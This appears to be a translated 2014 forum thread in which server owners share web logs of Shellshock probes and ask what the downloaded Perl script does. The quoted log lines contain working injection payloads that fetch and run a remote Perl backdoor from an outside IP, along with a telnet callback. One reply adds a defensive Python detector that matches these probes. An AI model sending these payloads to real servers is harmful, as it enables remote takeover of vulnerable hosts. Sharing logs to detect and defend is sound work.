Bash vulnerability: my server got scanned...

2014-09-26 19:16:12 +08:00
 juicy
I saw this log entry:

74.201.85.77 - - [26/Sep/2014:07:35:27 +0000] "GET / HTTP/1.0" 403 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"


Then I opened http://208.118.61.44/wow1, that file, and it scared the hell out of me... Can some Perl guru tell me what this script does?
4433 views
Node: Share & Discover
11 replies
20150517
2014-09-26 19:28:48 +08:00
You've been trojaned.
LazyZhu
2014-09-26 19:33:11 +08:00
http://193.2.50.126/stuff/linux/dbot.txt
kingwkb
2014-09-26 20:16:46 +08:00
Checked, and yes, I've got them too:

54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
xd547
2014-09-26 20:19:42 +08:00
Looks like mine got scanned too
$ sudo cat * |grep bash
209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22"
198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
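A small detector for this kind of probe, added here as an example and not code from anyone in this thread: it parses Apache combined-format lines like the ones above, restores the \xHH sequences Apache writes for quotes, and reports the source IP, which header field carried the payload and the trailing command. Both Referer and User-Agent are checked because the ping-back scanner puts its payload in Referer, which a grep for "bash" on the User-Agent alone would miss; the sample lines are constructed with documentation IPs.

```python
import re
from typing import Optional

# Apache combined log format; a trailing extra field (e.g. "-") is tolerated.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Shellshock trigger: an exported function body "() { :; }" followed by a
# trailing command that a vulnerable bash runs when it imports the variable.
# Scanners vary the whitespace, so it is matched loosely.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;?\s*\}\s*;\s*(?P<cmd>.+)$')

def unescape_apache(value: str) -> str:
    """Apache writes quotes and control bytes as \\xHH; restore them."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), value)

def classify_line(line: str) -> Optional[dict]:
    """Return details of a Shellshock probe in this line, or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Both Referer and User-Agent end up in the CGI environment, and
    # ping-back scanners put the payload in Referer, so check both.
    for field in ("referer", "agent"):
        hit = SHELLSHOCK_RE.search(unescape_apache(m.group(field)))
        if hit:
            return {"ip": m.group("ip"), "status": int(m.group("status")),
                    "request": m.group("request"), "field": field,
                    "command": hit.group("cmd").strip()}
    return None

def scan_log(lines) -> list:
    """Run classify_line over an iterable of raw log lines, keeping the hits."""
    return [hit for hit in map(classify_line, lines) if hit]

# Constructed sample lines (documentation IPs) mirroring the shapes seen in the thread.
SAMPLE_LOG = [
    r'203.0.113.7 - - [26/Sep/2014:07:35:27 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" '
    r'"() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.51.100.4/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"',
    r'192.0.2.10 - - [26/Sep/2014:08:01:02 +0000] "GET / HTTP/1.1" 200 2664 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'203.0.113.9 - - [26/Sep/2014:08:10:39 +0000] "GET / HTTP/1.0" 301 178 '
    r'"() { :; }; ping -c 11 203.0.113.9" "shellshock-scan (constructed sample)" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        # A 403/404 still means a probe arrived; only a bash-backed CGI target would have run it.
        print(f'{hit["ip"]} status={hit["status"]} via={hit["field"]} cmd={hit["command"]}')
```

A hit with a 200 on a static page is a probe that was not executed; a hit against a real CGI path that returned 200 or 500 is the one to investigate on the host.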
janxin
2014-09-26 20:51:48 +08:00
Looks like it just runs a Perl backdoor...
arcas
2014-09-26 20:53:25 +08:00
E486: 找不到模式: bash
binux
2014-09-26 20:56:48 +08:00
74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"

Got it too, and from a nearby IP.
binux
2014-09-26 21:01:33 +08:00
People are still doing this..

209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-"
fanta
2014-09-27 01:34:54 +08:00
That server seems to be down; wow1 can't be accessed anymore.
chijiao
2014-09-27 10:17:27 +08:00
Mine got scanned too. My fix was to put it behind a squid proxy.
sorcerer
2014-09-28 11:11:05 +08:00
This script was run on my machine too. Can someone tell me exactly what the script does, so I can take the appropriate action?

https://www.v2ex.com/t/135893